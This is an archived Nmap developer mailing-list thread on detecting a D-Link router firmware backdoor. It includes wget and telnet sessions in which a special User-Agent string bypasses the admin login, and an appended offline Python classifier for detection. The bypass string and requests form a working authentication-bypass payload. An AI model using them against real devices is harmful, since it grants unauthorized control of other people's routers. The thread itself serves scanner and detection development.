Nmap Development mailing list archives
Re: D-Link firmware backdoor
From: David Maynor <dave () erratasec com>
Date: Wed, 16 Oct 2013 12:54:05 +0000
These are done against the same IP, only difference is the user agent:

Davids-Mac-mini:dlink_scan dave$ wget -S --user-agent="xmlset_roodkcableoj28840ybtide" http://xxx.xxx.xxx.xxx
--2013-10-15 16:59:43--  http://xxx.xxx.xxx.xxx/
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.0 200 OK
  Server: Alpha_webserv
  Date: Tue, 15 Oct 2013 20:59:44 GMT
  Content-Type: text/html
  Accept-Ranges: bytes
  Connection: close
  X-Pad: avoid browser bug
Length: unspecified [text/html]
Saving to: ‘index.html’

    [ <=>                                  ] 1,445       --.-K/s   in 0.009s

2013-10-15 16:59:44 (149 KB/s) - ‘index.html’ saved [1445]

Davids-Mac-mini:dlink_scan dave$ wget -S http://xxx.xxx.xxx.xxx
--2013-10-15 17:00:09--  http://xxx.xxx.xxx.xxx/
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 401 Unauthorized
  Server: thttpd-alphanetworks/2.23
  Content-Type: text/html
  Date: Tue, 15 Oct 2013 21:00:10 GMT
  Last-Modified: Tue, 15 Oct 2013 21:00:10 GMT
  Accept-Ranges: bytes
  Connection: close
  WWW-Authenticate: Basic realm="BRL-04R"

Authorization failed.
Davids-Mac-mini:dlink_scan dave$

The server field gets set depending on your auth status. No auth gets you thttpd-alphanetworks/2.23 and auth gets Alpha_webserv.

On Oct 16, 2013, at 7:49 AM, Michael Meyer <michael.meyer () greenbone net> wrote:
> *** Patrik Karlsson wrote:
>> Please find a script attached to detect the D-Link firmware bypass outlined in this article:
>> http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
>> It's been a while since I committed something, so I will wait for some feedback before I do.
>
> Just a note about
>
>> ...
>> and server:match("^thttpd%-alphanetworks"))
>
> On some affected devices the server header is 'Server: Alpha_webserv' instead of 'Server: thttpd-alphanetworks/'
>
>> ...
>> if ( response.status == 200 )
>> ...
>
> and there are also some devices which do not send a header at all when this fake user-agent is set. On such devices you could check for the existence of 'self.location.href' after successfully bypassing the login.
>
> mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
> Trying 192.168.44.8...
> Connected to 192.168.44.8.
> Escape character is '^]'.
> GET / HTTP/1.0
>
> HTTP/1.0 401 Unauthorized
> Server: thttpd-alphanetworks/2.23
> Content-Type: text/html
> Date: Tue, 15 Oct 2013 11:51:23 GMT
> Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT
> Accept-Ranges: bytes
> Connection: close
> WWW-Authenticate: Basic realm="BRL-04UR"
>
> <HTML><HEAD><TITLE>401 Unauthorized</TITLE>
> [...]
>
> mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
> Trying 192.168.44.8...
> Connected to 192.168.44.8.
> Escape character is '^]'.
> GET / HTTP/1.0
> User-Agent: xmlset_roodkcableoj28840ybtide
>
> <HTML>
> <HEAD>
> <TITLE>BRL-04UR</TITLE>
> [...]
> self.location.href="index1.htm";
> [...]
>
> Micha
>
> --
> Michael Meyer
> OpenPGP Key: 52A6EFA6
> http://www.greenbone.net/
> Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460
> Managing Directors: Lukas Grunwald, Dr. Jan-Oliver Wagner
>
> _______________________________________________
> Sent through the dev mailing list
> http://nmap.org/mailman/listinfo/dev
> Archived at http://seclists.org/nmap-dev/
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
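The thread settles on three signals that a device has served its admin page without authentication: the status flips from 401 to 200 while the Server header is either thttpd-alphanetworks or Alpha_webserv, or no status line and headers come back at all and the body carries the self.location.href redirect. The following is an added example, not Patrik's NSE script and not code from the thread: it classifies a captured baseline response and a captured probe response offline using exactly those heuristics. The sample responses are constructed from the wget and telnet output quoted above; nothing here talks to a device, so it is the kind of response handler an auditing script would call after it has already made its two requests.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed samples modelled on the responses quoted in the thread.
# Plain request (no special User-Agent): the device answers with a Basic-auth challenge.
BASELINE_401 = (
    b"HTTP/1.1 401 Unauthorized\r\n"
    b"Server: thttpd-alphanetworks/2.23\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n"
    b'WWW-Authenticate: Basic realm="BRL-04R"\r\n'
    b"\r\n"
    b"<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD></HTML>"
)

# Variant 1 (David's wget): 200 and the Server header changes to Alpha_webserv.
PROBE_200_ALPHA = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Alpha_webserv\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<HTML><HEAD><TITLE>BRL-04R</TITLE></HEAD></HTML>"
)

# Variant 2 (what Patrik's original match expects): 200 with the thttpd Server header.
PROBE_200_THTTPD = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: thttpd-alphanetworks/2.23\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<HTML><HEAD><TITLE>BRL-04R</TITLE></HEAD></HTML>"
)

# Variant 3 (Michael's telnet capture): no status line or headers, only the page body.
PROBE_BODY_ONLY = (
    b"<HTML>\n<HEAD>\n<TITLE>BRL-04UR</TITLE>\n"
    b'<script>self.location.href="index1.htm";</script>\n'
    b"</HEAD></HTML>"
)

# An unaffected device answers the probe exactly as it answers the baseline.
PROBE_STILL_401 = BASELINE_401

# Both Server strings the thread reports for the affected web server family.
ALPHANETWORKS_SERVERS = ("thttpd-alphanetworks", "Alpha_webserv")


def parse_response(raw: bytes) -> Tuple[Optional[int], Dict[str, str], bytes]:
    """Split a raw HTTP response into (status, lower-cased headers, body).

    Status is None when there is no status line at all, which is how some
    affected devices answer according to the thread.
    """
    if not raw.startswith(b"HTTP/"):
        return None, {}, raw
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    status = int(m.group(1)) if m else None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def is_alphanetworks(server: str) -> bool:
    """True if the Server header names either variant seen on affected devices."""
    return server.startswith(ALPHANETWORKS_SERVERS)


def classify(baseline: bytes, probe: bytes) -> Tuple[bool, str]:
    """Decide whether the probe response shows the login being bypassed.

    baseline: response to a plain request; probe: response to the same request
    with the special User-Agent. Returns (affected, reason).
    """
    b_status, b_headers, _ = parse_response(baseline)
    p_status, p_headers, p_body = parse_response(probe)

    # Only reason about the web server family this thread is about; a 200 from
    # some other product says nothing about this bypass.
    if b_status != 401 or not is_alphanetworks(b_headers.get("server", "")):
        return False, "baseline is not a 401 from an alphanetworks web server"

    # Heuristic 1: page served (200) with either Server string.
    if p_status == 200 and is_alphanetworks(p_headers.get("server", "")):
        return True, "200 OK with Server: " + p_headers["server"]

    # Heuristic 2: no status line or headers, but the body is the post-login
    # page that redirects via self.location.href.
    if p_status is None and b"self.location.href" in p_body:
        return True, "headerless response containing self.location.href"

    return False, "probe still challenged with %s" % p_status


if __name__ == "__main__":
    for name, probe in [("alpha_webserv", PROBE_200_ALPHA), ("thttpd", PROBE_200_THTTPD),
                        ("body_only", PROBE_BODY_ONLY), ("unaffected", PROBE_STILL_401)]:
        print(name, classify(BASELINE_401, probe))
```

Requiring the baseline to be a 401 from the alphanetworks server before trusting any 200 is what keeps the check from flagging unrelated hosts that simply serve a page to everyone; the headerless variant is only accepted on the strength of the redirect Michael observed, since an empty or unrelated body proves nothing.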
Current thread:
- D-Link firmware backdoor Patrik Karlsson (Oct 15)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 17)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)